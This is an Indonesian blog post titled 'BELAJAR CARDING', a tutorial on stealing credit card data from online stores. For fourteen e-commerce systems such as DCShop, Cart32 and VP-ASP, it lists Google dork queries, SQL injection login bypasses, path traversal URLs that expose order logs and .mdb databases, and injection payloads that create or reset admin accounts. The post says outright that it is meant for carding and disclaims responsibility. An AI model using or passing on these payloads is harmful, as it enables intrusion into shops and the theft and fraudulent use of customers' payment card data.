Wednesday, April 2, 2014

BELAJAR CARDING



Hahaha Pasti tutorial ini yang paling kalian cari ..
wkwkwkwk >_<
kali ini saya akan share tentang belajar CARDING :P
WOW banget .. langsung simak yaa .. pelan2 baca nya . biar paham ..
hhehe :)

1. Bugs pada bentuk toko sistem shopadmin :

Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/shopadmin.asp
Contoh target : http://www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. Bugs pada bentuk toko sistem : Index CGI

Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/store/index.cgi/page=

Contoh target : http://www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya: http://www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log


3. Bugs pada bentuk toko sistem : metacart

Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/metacart/
Contoh target : http://www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : http://www.xxxxxx.com/metacart/database/metacart.mdb

4. Bugs pada bentuk toko sistem : DCShop
Contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik di google search :–> allinurl:/DCShop/
Contoh : http://www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : http://www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. Bugs pada bentuk toko sistem : PDshopro
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/shop/category.asp/catid=
Contoh : http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dan ganti dengan –> /admin/dbsetup.asp
Hasilnya : http://www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dengan nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi http://www.xxxxxx.com/data/pdshoppro.mdb
Buka file tersebut menggunakan Microsoft Acces.

6. Bugs pada bentuk toko sistem : commerceSQL
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/commercesql/
Contoh : http://www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –> cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
http://www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
http://www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
http://www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...;

7. Bugs pada bentuk toko sistem : EShop
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/eshop/
Contoh : http://www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tersebut menggunakan Microsoft Acces

8 Bugs pada bentuk toko sistem : Cart32 v3.5a
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/cart32.exe/
Contoh : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dengan keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tersebut terdapat file berisi data Credit Card.
Copy salah satu file .c32 yang ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tersebut menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah, paste satu per satu, file .c32 ke akhir url yang sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh : http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. Bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Teknik/jalan ke dua
Ketik di google search :–> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%…,
Ganti dengan
fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dengan:
%20′a%25′–
%20′b%25′–
%20′c%25′–

Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
Silahkan Cari sendiri data Credit Card-nya

10. Bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl:/vpasp/shopsearch.asp

Buka url target dan untuk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(")–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=" where
fldusername="–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername="–&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=" where
fldusername='admin'–&SubCategory=All&action.x=33&action.y=6

11. Bugs pada bentuk toko sistem : Lobby.asp
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik di google search :–> allinurl: Lobby.asp
Contoh : http://www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : http://www.xxxxx.com/fpdb/shop.mdb
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

12. Bugs pada bentuk toko sistem : Shopper.cgi
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : http://www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> ...&template=order.log
Hasilnya : http://www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template...;

13. Bugs pada bentuk toko sistem : Proddetail.asp
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Google : Ketik –> allinurl:proddetail.asp?prod=
Contoh : http://www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : http://www.xxxxxx.org/fpdb/vsproducts.mdb

14. Bugs pada bentuk toko sistem : Digishop
Contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Google Ketik –> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –> admin
Hasilnya : http://xxxxxx.com/store/admin
Trus masukan username dan pass nya pake statment SQL injection
Usename : 'or"="
Password : 'or"="

Demikianlah cara dalam Carding , yang mungkin saja masih bisa dipakai di jaman sekarang ini, karena dengan perkembangan ilmu dan teknologi, para pemilik Toko Online mungkin saja akan menutupi celah-celah tersebut sehingga cara-cara diatas tidak bisa digunakan lagi.

Semua Tindakan Anda Di luar tanggung jawab saya .
Sekian dan terima kasih ..

I love Watanabe Mayu ( Mayuyu AKB48 ) :) :*

Content Creator : ./V404
 

source: YogyaCarding

0 comments:

Post a Comment